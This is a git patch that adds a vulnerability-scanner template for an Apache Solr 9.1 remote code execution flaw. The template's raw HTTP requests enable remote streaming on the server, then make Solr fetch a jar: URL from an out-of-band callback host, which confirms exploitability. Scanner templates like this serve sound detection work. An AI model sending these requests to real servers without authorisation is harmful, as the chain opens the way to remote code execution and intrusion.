From 25fa0d9aa5bc933f6826061e8060288710608fa6 Mon Sep 17 00:00:00 2001
From: j4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Fri, 14 Apr 2023 23:18:11 +0800
Subject: [PATCH] Create apache-solr-9.1-rce.yaml

---
 vulnerabilities/apache-solr-9.1-rce.yaml | 45 ++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 vulnerabilities/apache-solr-9.1-rce.yaml

diff --git a/vulnerabilities/apache-solr-9.1-rce.yaml b/vulnerabilities/apache-solr-9.1-rce.yaml
new file mode 100644
index 0000000000..50f220fcad
--- /dev/null
+++ b/vulnerabilities/apache-solr-9.1-rce.yaml
@@ -0,0 +1,45 @@
+id: apache-solr-9.1-rce
+
+info:
+  name: Apache Solr 9.1 RCE
+  author: j4vaovo
+  severity: critical
+  description: |
+    Apache Solr 9.1 RCE
+  reference:
+    - https://noahblog.360.cn/apache-solr-rce/
+  tags: solr,apache,rce,oast
+
+requests:
+  - raw:
+      - |
+        POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
+
+      - |
+        POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9
+        Connection: close
+
+        --------------------------5897997e44b07bf9
+        Content-Disposition: form-data; name="stream.url"
+
+        jar:http://{{interactsh-url}}/test.jar?!/Test.class
+        --------------------------5897997e44b07bf9--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: Java"